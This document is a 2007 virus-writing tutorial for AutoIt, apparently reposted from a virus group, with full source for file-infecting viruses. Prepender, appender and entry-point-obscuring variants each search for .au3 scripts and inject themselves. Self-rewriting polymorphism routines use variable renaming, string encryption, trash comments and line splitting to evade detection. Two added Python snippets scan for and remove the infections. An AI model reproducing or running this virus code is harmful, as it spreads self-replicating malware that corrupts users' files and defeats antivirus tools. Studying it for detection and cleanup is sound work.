Genetix AutoItv3 Vir Tutorial

This document provides instructions for creating polymorphic AutoIt virus code through various techniques like variable renaming, string encryption, inserting random trash code, and breaking up code lines. The techniques are meant to evade detection by changing the virus' appearance each time it infects a new host file. Methods like prepender, appender and End-Of-Procedure (EPO) injection are described for introducing the virus code into host AutoIt files.

Uploaded by

2lazy2cool

AutoIt Virus Writing Guide

Genetix[DoomRiderz]
JAN-2007

Introduction:

* About AutoIt

Infections:

* Prepender
* Appender
* EPO

Polymorphism:

* Variable changing
* Randomized String Encryption
* Adding trash
* Breaking lines (Possibly New method)

Outroduction:

* Credits!....

++++++++++++++++++++++++++++++++++++
++++++++++About AutoIt+++++++++++++
+--------------------------------------------------------------------------------------
++++++++++++++++++++++++++++++++++++

AutoIt v3 is a freeware BASIC-like scripting language designed for automating
the Windows GUI and general scripting. It uses a combination of simulated
keystrokes, mouse movement and window/control manipulation in order to automate
tasks in a way not possible or reliable with other languages (e.g. VBScript and
SendKeys). AutoIt is also very small, self-contained and will run on 95, 98, ME,
NT4, 2000, XP & 2003 out of the box with no annoying "runtimes" required! You
can even make compiled executable scripts that can run without AutoIt being
installed!

AutoIt was initially designed for PC 'roll out' situations to reliably
configure thousands of PCs, but with the arrival of v3 it has become a powerful
language able to cope with most scripting needs.

This is from the AutoIt website (I'm lazy!), see
http://www.hiddensoft.com/autoit3/

So anyway, in my opinion it's just ANOTHER scripting language and nobody serious
about virus writing cares about these things, but for me it's all about fun and
enjoying yourself, so just do whatever you enjoy. I enjoyed this, so maybe
someone else will too.

++++++++++++++++++++++++++++++++++++
+++++++++++++Prepender+++++++++++++
+--------------------------------------------------------------------------------------
++++++++++++++++++++++++++++++++++++

;Genetix[DoomRiderz]

$self=@ScriptName
;get self name
$line=""
$virus=""
$readhost=""
$me = FileOpen($self, 0)
;open self
while 1
$line = FileReadLine($me)
;read line
If @error = -1 Then ExitLoop
;exit EOF
if ($line = ";endvirus") then
ExitLoop
;exit at end of the virus code
EndIf
$virus = $virus & @CRLF & $line
;build virus body
Wend
FileClose($me)

$search = FileFindFirstFile("*.au3")
;find AutoIt files
If $search = -1 Then
Exit
;exit no files
EndIf

While 1
$file = FileFindNextFile($search)
if ($file == "") then ExitLoop
;same exit if no files
$host = FileOpen($file, 0)
If $host = -1 then ExitLoop
;exit EOF
$readhost = FileRead($host, FileGetSize($file))
;read entire file into variable
FileClose($host)
if StringInStr($readhost, ";Genetix[DoomRiderz]") <> True Then
;make sure it's not already infected
$InsertVirus = FileOpen($file,2)
FileWriteline($InsertVirus, _
$virus & @CRLF ";endvirus" & @CRLF & $readhost)
;write virus before victims code (prepend)
FileClose($InsertVirus)
EndIf
Wend
;continue searching

;endvirus

++++++++++++++++++++++++++++++++++++
+++++++++++++Appender++++++++++++++
+--------------------------------------------------------------------------------------
++++++++++++++++++++++++++++++++++++

;start
;Genetix[DoomRiderz]

$self=@ScriptName
;get script name
$line=""
$virus=""
$readhost=""
$me = FileOpen($self, 0)
;open self
while 1
$line = FileReadLine($me)
If @error = -1 Then ExitLoop
;exit if EOF
if ($line = ";start") then
;find beginning of virus code
ExitLoop
;exit loop when found
EndIf
Wend
while 1
$line = FileReadLine($me)
;read 1 line per loop
If @error = -1 Then ExitLoop
;exit EOF
if ($line = ";endvirus") then
ExitLoop
;Stop reading at end of virus
EndIf
$virus = $virus & @CRLF & $line
;build the virus
Wend
FileClose($me)

$search = FileFindFirstFile("*.au3")
;search for AutoIt files
If $search = -1 Then
Exit
;exit if nothing is there
EndIf
While 1
$file = FileFindNextFile($search)
if ($file == "") then ExitLoop
$host = FileOpen($file, 0)
;open victim
If $host = -1 then ExitLoop
;exit EOF
$readhost = FileRead($host, FileGetSize($file))
;read the entire host code
FileClose($host)
if StringInStr($readhost, ";Genetix[DoomRiderz]") <> True Then
;make sure it isn't infected already
$InsertVirus = FileOpen($file,2)
FileWriteline($InsertVirus, _
$readhost & @CRLF & ";start" & @CRLF & $virus & @CRLF & ";endvirus")
;append the virus
FileClose($InsertVirus)
EndIf
Wend
;continue searching

;endvirus

++++++++++++++++++++++++++++++++++++
++++++++++++++++EPO++++++++++++++++
+--------------------------------------------------------------------------------------
++++++++++++++++++++++++++++++++++++

;start
;Genetix[DoomRiderz]
$self=@ScriptName
;get script name

;setup some variables, this needs a lot!
$line=""
$begin=""
$virbody=""
$virus=""
$nextpart=""
$readhost=""
$complete=""
$me = FileOpen($self, 0)
;open itself
while 1
;loop until ExitLoop do us part
$line = FileReadLine($me)
;read 1 line per loop
If @error = -1 Then ExitLoop
;exit EOF
if ($line = ";start") then
ExitLoop
;stop, beginning of the virus is found
EndIf
Wend
while 1
$line = FileReadLine($me)
;read 1 line per loop
If @error = -1 Then ExitLoop
;yea..
if StringMid($line, 1, 9) = ";endvirus" Then
ExitLoop
;stop, end of the virus is found
EndIf
$virbody = $virbody & @CRLF & $line
;build the virus body
Wend
FileClose($me)
;byez
$virus = ";start" & @CRLF & $virbody & @CRLF & ";endvirus"
;virus stored in $virus

$search = FileFindFirstFile("*.au3")
;find files
If $search = -1 Then
Exit
;exit if nothing is there
EndIf

While 1
$file = FileFindNextFile($search)
if ($file == "") then ExitLoop
;again.. nvm
$host = FileOpen($file, 0)
;open any au3 file
If $host = -1 then ExitLoop
$readhost = FileRead($host, FileGetSize($file))
;read it entire host into $readhost
FileClose($host)
if StringInStr($readhost, ";Genetix[DoomRiderz]") <> True Then
;check if it's already infected
if StringInStr($readhost, "EndFunc") <> False Then
;can it use EPO on this file?
$target = FileOpen($file, 0)
;open up the victim file again
while 1
;loopy
$line = FileReadLine($target)
;read 1 line per loop
If @error = -1 Then ExitLoop
;exit EOF
if ($line = "EndFunc") then
;find a home for the virus
ExitLoop
;exit loop when thats found
EndIf
$begin = $begin & @CRLF & $line
;append lines from start to "EndFunc"
Wend
while 1
$line = FileReadLine($target)
;read line's again
If @error = -1 Then ExitLoop
;exit EOF
$nextpart = $nextpart & @CRLF & $line
;read from "EndFunc" to EOF
Wend
FileClose($target)

;here the virus gets 2 parts of the victim. First is everything until "EndFunc", 2nd is everything after it
;so it has these stored in 2 different variables.
;now we can insert the virus into the middle! hostpart1 + virus + hostpart2. easy!

$complete = $begin & @CRLF & $virus & @CRLF & "EndFunc" & @CRLF & $nextpart
;join everything together
$InsertVirus = FileOpen($file,2)
;open the victim for writing
FileWriteline($InsertVirus, $complete)
;insert the virus
FileClose($InsertVirus)
EndIf
EndIf
Wend
;more searching!

;endvirus
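All three infection routines above leave the same strings in the host: the ;Genetix[DoomRiderz] marker (the virus needs it to avoid re-infecting a file) and the ;endvirus boundary, with ;start added by the appender and EPO variants. The scanner below is an added Python example, not part of the tutorial; it uses exactly those strings to classify an .au3 file and cut the injected block back out, and the host script and virus body it is checked against are constructed samples.

```python
"""Scanner/cleaner for .au3 files carrying the prepender, appender or EPO
infections described above. Added example, not the tutorial's code."""

MARKER = ";Genetix[DoomRiderz]"      # marker every variant checks before infecting
START, END = ";start", ";endvirus"   # boundary comments the appender and EPO copy

def classify(src):
    """Return 'prepender', 'appender', 'epo' or None for a clean file."""
    lines = src.splitlines()
    if MARKER not in src or END not in lines:
        return None
    if START not in lines:
        return "prepender"           # virus body sits at the top, ending at ;endvirus
    tail = lines[lines.index(END) + 1:]
    # appender leaves nothing after ;endvirus; EPO re-adds EndFunc and the rest
    return "appender" if not any(t.strip() for t in tail) else "epo"

def disinfect(src):
    """Cut the injected block out; returns (kind, cleaned_source)."""
    kind = classify(src)
    if kind is None:
        return None, src
    lines = src.splitlines()
    first = 0 if kind == "prepender" else lines.index(START)
    last = lines.index(END)
    return kind, "\n".join(lines[:first] + lines[last + 1:]) + "\n"

# Constructed samples: a tiny host plus the three layouts the page's code writes
HOST = "Func Hello()\n  MsgBox(0, \"\", \"hi\")\nEndFunc\nHello()\n"
BODY = MARKER + "\n$self=@ScriptName\n$me = FileOpen($self, 0)\n"
PREPENDED = BODY + END + "\n" + HOST
APPENDED = HOST + START + "\n" + BODY + END + "\n"
EPO = HOST.replace("EndFunc", START + "\n" + BODY + END + "\nEndFunc")

if __name__ == "__main__":
    for name, sample in (("clean", HOST), ("prepended", PREPENDED),
                         ("appended", APPENDED), ("epo", EPO)):
        kind, cleaned = disinfect(sample)
        print(name, "->", kind, "host restored:", cleaned == HOST)
```

The blank lines the infection routines write around the block (the leading @CRLF in $virus and $nextpart) are left in place by disinfect, so a real cleaned file may differ from the original host by whitespace only.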

++++++++++++++++++++++++++++++++++++
+++++Variable name changing++++++++
+--------------------------------------------------------------------------------------
++++++++++++++++++++++++++++++++++++

#include <Array.au3>
;include this to use arrays in AutoIt

Dim $avArray
;define array
$avArray = _ArrayCreate("avArray", "self", "host", "readhost", _
"rewrite", "newvalues", "var")
;setup variables to replace

$self=@ScriptName
;get the script name
$readhost=""
$host = FileOpen($self, 0)
;open self
If $host = -1 then ExitLoop
;exit EOF
$readhost = FileRead($host, FileGetSize($self))
;read entire virus into variable
FileClose($host)

$newvalues=""
FOR $i=0 to UBound($avArray) - 1
;loop through each element in the array
$var=""
for $x=1 to random(6,12,1)
$var = $var & Chr(random(97,122,1))
;create a new random sized variable
;this can be improved a lot!
next
$readhost = StringReplace($readhost, $avArray[$i], $var)
;replace with new variable
Next

$rewrite = FileOpen($self,2)
FileWrite($rewrite, $readhost)
;rewrite with new code
FileClose($rewrite)

++++++++++++++++++++++++++++++++++++
++++Randomized String Encryption+++
+--------------------------------------------------------------------------------------
++++++++++++++++++++++++++++++++++++

$self=@ScriptName
;get the script name
$readhost=""
$host = FileOpen($self, 0)
If $host = -1 then ExitLoop
$readhost = FileRead($host, FileGetSize($self))
;read everything into the variable
FileClose($host)
$code="ÐÌÂÍËÇØÃÂ~ÑÒÐÇÌÅ~ÃÌÁÐ×ÎÒÇÍÌ94"
;the encrypted string with key appended
$original=$code
;original code
$key=StringMid($code, stringlen($code)-1, stringlen($code))
;get the decryption key
$decrypt=""
$de=""
For $i=1 to StringLen($code)
$de = Asc(StringMid($code, $i, 1)) - $key
;decrypt using key
$decrypt = $decrypt & chr($de)
Next
$mycode=StringMid($decrypt, 1, stringlen($decrypt)-2)
;remove old key
MsgBox(0, "", $mycode)
;good for debugging
$rndkey = Random(10,99,1)
;get a new random key
$str=""
$en=""
For $i=1 to StringLen($mycode)
$str = Asc(StringMid($mycode, $i, 1)) + $rndkey
;encrypt with new key
$en = $en & chr($str)
Next
$new = StringReplace($code, $code, $en) & $rndkey
;replace old encrypted string with new
$newstr=StringReplace($readhost, $original, $new)
;replace it in the virus code
$replace = FileOpen($self,2)
FileWrite($replace, $newstr)
;complete!
FileClose($replace)

Actually the idea is to encrypt the virus body so it changes like polymorphism
while also being encrypted, but this is good enough for an example, I guess.

++++++++++++++++++++++++++++++++++++
++++++++Adding Trash to code+++++++
+--------------------------------------------------------------------------------------
++++++++++++++++++++++++++++++++++++

$self=@ScriptName
;get self name
$line=""
$virus=""
$me = FileOpen($self, 0)
;open self
while 1
$line = FileReadLine($me)
;read line
If @error = -1 Then ExitLoop
;exit EOF
if random(1,2,1) = 2 then
;should it insert trash here?
$trash=""
For $i = 1 to random(30,100,1)
;random size 30 to 100 characters
$trash=$trash & chr(random(50,97,1))
;generate trash
next
$line=$line & @CRLF & ";" & $trash
;insert trash
EndIf
If StringMid($line,1,1) <> ";" then
$virus = $virus & @CRLF & $line
;build the new virus body
EndIf
Wend
FileClose($me)

$rewrite = FileOpen($self,2)
FileWrite($rewrite, $virus)
;rewrite with new code
FileClose($rewrite)

++++++++++++++++++++++++++++++++++++
+++++++++++Breaking Lines++++++++++
+--------------------------------------------------------------------------------------
++++++++++++++++++++++++++++++++++++

I'm guessing you've not seen this method before? But if you have, then here it
is again.

$curline=""
$rem=""
$restore=""
$NewCode=""
$me = FileOpen(@ScriptName, 0)
;open self for reading
while 1
$curline=FileReadLine($me)
;read the first line
If @error = -1 Then ExitLoop
;exit at EOF
FOR $i = 1 to 20
;some things i just cant explain!
IF StringInStr($curline, chr(95)) then
;check if there is an underscore in this line
$rem = stringmid($curline, 1, StringInStr($curline, chr(95)) - 1)
;remove the underscore
$restore = $rem & FileReadLine($me)
;join the line back together
$curline = $restore
;set curline back to its normal self
ENDIF
NEXT

$curline = DoSplit($curline)
;call function to do the line splitting
$NewCode = $NewCode & @CRLF & $curline
;build the new code
wend
FileClose($me)

$rewrite = FileOpen(@ScriptName, 2)
;open self for writing
FileWrite($rewrite, $NewCode)
;rewrite with new code
FileClose($rewrite)
;close.

Func DoSplit($line)
;entry point of splitting function
DIM $pos,$pr1,$pr2,$add,$m=""
;setup some variables
FOR $i = 1 to stringlen($line)
;loop through the line
$m = stringmid($line, $i, 1)
;get the current character
IF $m = chr(44) OR $m = chr(61) OR $m = chr(38) then
;check if its anything we can use
$pr1 = stringmid($line, 1, $i)
;get the line from start to pos of $m
$pr2 = stringmid($line, $i+1, stringlen($line))
;other half from $m to end of line
IF Random(1,2,1) = 2 THEN $line = $pr1 & " " & chr(95) & @CRLF & $pr2
;if rnd is 2 then split the line into 2 parts
ENDIF
NEXT
Return $line
;return the new line
EndFunc

;here is an example of what this method can do:
;a line of code can look like this:
stringmid($curline, 1, StringInStr($curline, chr(95)) - 1)
;it can also look like this
stringmid($curline, 1, _
StringInStr($curline, chr(95)) - 1)
;or this:
stringmid($curline, _
1, StringInStr($curline, _
chr(95)) - 1)
;and so on..

So each time the code is executed it will add a continuation character "_" in
random locations, but only where the location supports a continuation: anything
after these characters (, = &) will allow an underscore "_". Splitting 1 line
into 2 parts or more, or joining them back to form a single line. Kinda really
simple stuff! You should try this to understand it better; it's easy to rewrite
into VBS and everyone knows VBS, don't they?
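Both the trash comments and the continuation splitting leave the executable statements themselves untouched, so a scanner that normalizes a script before matching (drop comment lines, re-join " _" continuations, collapse whitespace, lowercase since AutoIt identifiers are case-insensitive) sees one and the same line in all three renderings above. Added Python example, not the tutorial's code; its inputs are the page's three renderings of the stringmid line plus a constructed trash comment, and the variable renaming from the earlier section is not reversed by this.

```python
"""Normalizer that undoes the 'adding trash' and 'breaking lines' transformations
before signature matching. Added example, not the tutorial's AutoIt code."""
import re

# A trash comment is ';' followed by 30..100 characters drawn from chr(50)..chr(97)
TRASH_RE = re.compile(r"^;[2-a]{30,100}$")

def trash_lines(src):
    """Count comment lines that match the page's trash generator."""
    return sum(1 for l in src.splitlines() if TRASH_RE.match(l.strip()))

def normalize(src):
    """Return the script as one canonical statement per line."""
    out, pending = [], ""
    for raw in src.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):     # comments (and trash) carry no code
            continue
        line = pending + line
        if line.endswith(" _"):                 # AutoIt continuation: keep accumulating
            pending = line[:-2].rstrip() + " "
            continue
        out.append(re.sub(r"\s+", " ", line).lower())
        pending = ""
    if pending:                                  # dangling continuation at EOF
        out.append(re.sub(r"\s+", " ", pending.strip()).lower())
    return "\n".join(out)

# Constructed inputs: the page's three renderings of one statement, plus trash
ONE_LINE = "stringmid($curline, 1, StringInStr($curline, chr(95)) - 1)\n"
SPLIT_A = "stringmid($curline, 1, _\nStringInStr($curline, chr(95)) - 1)\n"
SPLIT_B = "stringmid($curline, _\n1, StringInStr($curline, _\nchr(95)) - 1)\n"
WITH_TRASH = ONE_LINE + ";5;Q]M8@W>X^2P7J`GDa[L4<B\\_E9NC3T\n"

if __name__ == "__main__":
    base = normalize(ONE_LINE)
    for name, s in (("split_a", SPLIT_A), ("split_b", SPLIT_B), ("trash", WITH_TRASH)):
        print(name, "same after normalize:", normalize(s) == base,
              "trash lines:", trash_lines(s))
```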

-------------------------------------------------------------------------------------------

CREDITS!
Kefi - I'm still awaiting an email from you!
retr0 - BUZZ!
free0n - puts dances around a lamb pole :p
synge - i forgive you for your evil deeds.
slagehammer - thx for all the asm sources it's just what i needed! yays!
jmp dr3f
dr3f: mov irc,[you]
And hellos to everyone in DoomRiderz and anyone else missing, I just want to
get this over with!

ps:
i had this strange idea of polymorphism of a kind.. encrypting/decrypting
random lines.. i had some success but then
got busy with "real life" (yes synge i have 1 :p) so someone else can try this
if they think it's worth it.

That's all, hope you enjoyed!

byez!
